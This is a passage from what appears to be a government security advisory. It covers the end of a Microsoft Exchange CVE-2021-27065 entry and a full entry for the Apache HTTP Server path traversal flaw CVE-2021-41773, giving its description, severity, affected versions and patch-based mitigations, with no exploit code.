  • Install Microsoft security patch.
  • Use Microsoft Exchange On-Premises Mitigation Tool.

Detection Methods

Vulnerable Technologies and Versions

Microsoft Exchange Servers

References

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065

Table XXI: Apache CVE-2021-41773

Apache CVE-2021-41773 CVSS 3.0: 7.5 (High)

Vulnerability Description

This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied,” these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013).

Recommended Mitigations

  • Apply update or patch.

Detection Methods

  • Commercially available scanners can detect CVE.

Vulnerable Technologies and Versions

Apache HTTP Server 2.4.49 and 2.4.50

Fedoraproject Fedora 34 and 35

Oracle Instantis Enterprise Track 17.1-17.3

Netapp Cloud Backup

Revisions

  • Initial Publication: October 6, 2022

This product is provided subject to this Notification and this Privacy & Use policy.